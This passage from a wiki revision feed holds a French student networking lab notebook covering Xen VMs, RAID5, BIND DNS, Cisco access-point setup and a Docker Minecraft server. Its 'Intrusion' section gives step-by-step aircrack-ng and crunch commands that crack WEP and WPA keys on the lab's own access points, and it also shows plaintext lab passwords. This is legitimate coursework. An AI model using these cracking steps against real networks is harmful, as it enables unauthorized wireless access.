                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Point d'accès wifi=&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60262</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60262"/>
				<updated>2022-11-28T23:32:08Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Point d'accès wifi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60261</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60261"/>
				<updated>2022-11-28T23:31:38Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Point d'accès wifi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
